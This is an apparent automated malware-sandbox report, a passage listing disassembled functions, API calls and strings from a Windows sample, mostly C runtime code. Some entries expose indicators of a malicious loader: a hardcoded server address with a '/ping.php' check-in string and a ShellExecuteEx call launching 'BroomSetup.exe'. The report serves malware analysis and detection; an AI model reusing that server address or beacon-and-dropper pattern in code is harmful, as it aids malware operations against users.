Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0433DAB8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0433DB07
_free.LIBCMT ref: 0433DC24

Part of subcall function 04330B99: IsProcessorFeaturePresent.KERNEL32(00000017,04330B6B,00000016,04332DA0,0000002C,00439740,0433D634,?,?,?,04330B78,00000000,00000000,00000000,00000000,00000000), ref: 04330B9B
Part of subcall function 04330B99: GetCurrentProcess.KERNEL32(C0000417,04332DA0,00000016,04337003), ref: 04330BBD
Part of subcall function 04330B99: TerminateProcess.KERNEL32(00000000), ref: 04330BC4

Strings

*?, xrefs: 0433DAFB
., xrefs: 0433DDDB

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
Instruction ID: 26ea7e95c7a84583d6ae3d0f6c1717e559746c2348b354d0c5e55d8c2eff7687
Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
Instruction Fuzzy Hash: 2151A271E00209AFDF15DFA8C880AADFBF5FF88715F2491A9D855E7340E675AA018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0041D851 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0041D8A0
_free.LIBCMT ref: 0041D9BD

Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D

Strings

*?, xrefs: 0041D894
., xrefs: 0041DB74

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0433352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zLwT7vCojz.exe,00000104), ref: 0433356A
_free.LIBCMT ref: 04333635
_free.LIBCMT ref: 0433363F

Strings

C:\Users\user\Desktop\zLwT7vCojz.exe, xrefs: 04333561, 04333568, 04333597, 043335CF

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\zLwT7vCojz.exe
API String ID: 2506810119-304640906
Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
Instruction ID: 064fa542712c90b7f2fb2a731b95b75e60cc6fd1edfaee0e7adabf0a037b8646
Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
Instruction Fuzzy Hash: 3F317371A04258AFFB21DF999CC499EBBFCEF84716F109066E80597210D770AA41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zLwT7vCojz.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\zLwT7vCojz.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\zLwT7vCojz.exe
API String ID: 2506810119-304640906
Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 043237D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 043237DB

Strings

/ping.php?substr=%s, xrefs: 043237E3
185.172.128.228, xrefs: 043237E2
Installed, xrefs: 043237E4

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228$Installed
API String ID: 3519838083-3380671521
Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
Instruction ID: 2f9aa214828bd82a9e054f05166e7e476542bcb78e09976c20da0bbd603d2637
Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
Instruction Fuzzy Hash: 120192B2A01525ABEB05DF98DE40BAEB7B9FF84714F10152AF805E7240D374BA51C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

Installed, xrefs: 0040357D
185.172.128.228, xrefs: 0040357B
/ping.php?substr=%s, xrefs: 0040357C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228$Installed
API String ID: 3519838083-3380671521
Opcode ID: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
Opcode Fuzzy Hash: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9

Uniqueness

Uniqueness Score: -1.00%

Function 043464C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 04346509
WaitForSingleObject.KERNEL32(?,00008000), ref: 0434651D
CloseHandle.KERNEL32(?), ref: 04346526

Strings

/BroomSetup.exe, xrefs: 043464D2

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: /BroomSetup.exe
API String ID: 3837156514-1897133622
Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
Instruction ID: ad8df09b97567641ce1559e0381a4e577256310c56b9c7d9f880ee9a6a22295c
Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
Instruction Fuzzy Hash: B1015A71E00218EBDB25DF69E9415DDBFB8EF48610F00812AE805A6260EB70A645CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04337FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04338061
__alldvrm.LIBCMT ref: 04338262
__alldvrm.LIBCMT ref: 04338284

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
Instruction ID: 8fb50d931e558b83608cc03759361b0958d6d423baf18f46befb7e1cf18fc5ac
Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
Instruction Fuzzy Hash: 38A19932E00B86AFEB29EF58C8807BEBBE4EF51355F1451ADF8949B241D238B941C750

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758

Uniqueness

Uniqueness Score: -1.00%

Function 04342C06 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04342D35

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
Instruction ID: bbac62dcdca368132fbfd31d95e4b1b097745069759f2a03092cb8e8de116f2b
Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
Instruction Fuzzy Hash: 64413E71A005006BFB256FB89C44AEF7AE8EFC63B5F142295F424F61E0DA74B9405761

Uniqueness

Uniqueness Score: -1.00%

Function 0042299F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00422ACE

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD

Uniqueness

Uniqueness Score: -1.00%

Function 0433B690 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,04334002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 0433B6DD
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0433B766
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0433B778
__freea.LIBCMT ref: 0433B781

Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
Instruction ID: b5822c6eb095266251a77de62f11dd30dd0b9b5682c384f0a875b48da90c3d02
Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
Instruction Fuzzy Hash: 1131B272A0021AABEF259F64CC85EAFBBA5EF40712F054168EC14DB151EB35FD54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0432CF0B Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0432CF25

Part of subcall function 0432CE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0432CEA1
Part of subcall function 0432CE72: ___AdjustPointer.LIBCMT ref: 0432CEBC

_UnwindNestedFrames.LIBCMT ref: 0432CF3A
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0432CF4B
CallCatchBlock.LIBVCRUNTIME ref: 0432CF73

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
Instruction ID: d6c12b7279e8020a2e5e6019061b160f93dabd7c510a1439e055ed16961df072
Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
Instruction Fuzzy Hash: 86012972100119BBEF126E95CE40DEF7B6AFF88758F046004FE4896120D732E861EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCA4 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE

Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55

_UnwindNestedFrames.LIBCMT ref: 0040CCD3
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 043374BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0432ED94,00000000,00000000,?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8), ref: 043374EC
GetLastError.KERNEL32(?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,04337052), ref: 043374F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 04337506

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
Instruction ID: f9ed76888fb2024472e1431e0db506d10ffc449e1e3b9e1a54d80a6cec207ad7
Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
Instruction Fuzzy Hash: F10147723426279BEB348F28AC44E5A3B98AF047A3751C534F906E3181EF20F801CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308

Strings

"A, xrefs: 0041E303, 0041E306

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: "A
API String ID: 546120528-1838006985
Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99

Uniqueness

Uniqueness Score: -1.00%

Function 043465BB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 043465C0

Part of subcall function 04324073: __EH_prolog.LIBCMT ref: 04324078
Part of subcall function 04324073: std::locale::_Init.LIBCPMT ref: 0432409A

_Deallocate.LIBCONCRT ref: 04346714

Strings

hzB, xrefs: 043465BB

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: H_prolog$DeallocateInitstd::locale::_
String ID: hzB
API String ID: 2389838984-4102550090
Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
Instruction ID: 75661584aa6efebb2215b2d1d03167180ba9bfc05d55a0357c15a35c49d68f5e
Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
Instruction Fuzzy Hash: C251CC71A01258DFEB08DFA9C9909EDFBB5FF98304F64522EE405A7281D738AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51

Strings

^A, xrefs: 0041DF43
, xrefs: 0041DF96

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Info
String ID: $^A
API String ID: 1807457897-1499568600
Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0432CA17 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0432CA4A
__IsNonwritableInCurrentImage.LIBCMT ref: 0432CB03

Strings

csm, xrefs: 0432CAED

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
Instruction ID: f7238f14ea0ae1a4c893d9cf08f78a5f8c26db38e2b2ebaac2ae694bf4e4edb3
Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
Instruction Fuzzy Hash: ED41D730E00228ABDF10DF68C984AAE7BB5EF45328F14A166E915AB391D731F905CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04340129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04340384,?,00000050,?,?,?,?,?), ref: 04340204

Strings

OCP, xrefs: 0434017D
ACP, xrefs: 04340147

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
Instruction ID: 534cab4940c4f7cd1ca0b20c5494377ffda440c26ba1072ab5755e4f4d0d9e9d
Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
Instruction Fuzzy Hash: 2121606AB00205A6E7288E54CD41BE772FAAFD4B51F46A424EB2AE7540F736F9418250

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D

Strings

OCP, xrefs: 0041FF16
ACP, xrefs: 0041FEE0

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258

Uniqueness

Uniqueness Score: -1.00%

Function 043233DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 043233E1
std::locale::_Init.LIBCPMT ref: 04323428

Part of subcall function 04327FDA: __EH_prolog3.LIBCMT ref: 04327FE1
Part of subcall function 04327FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04327FEC
Part of subcall function 04327FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04328007
Part of subcall function 04327FDA: _Yarn.LIBCPMT ref: 0432801D
Part of subcall function 04327FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0432805D

Part of subcall function 04323651: __EH_prolog.LIBCMT ref: 04323656
Part of subcall function 04323651: std::_Lockit::_Lockit.LIBCPMT ref: 04323665
Part of subcall function 04323651: int.LIBCPMT ref: 0432367C
Part of subcall function 04323651: std::locale::_Getfacet.LIBCPMT ref: 04323685
Part of subcall function 04323651: std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC

Part of subcall function 04321AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 04321B30
Part of subcall function 04321AE6: std::system_error::system_error.LIBCPMT ref: 04321B3F

Strings

=wB, xrefs: 043233DC

Memory Dump Source

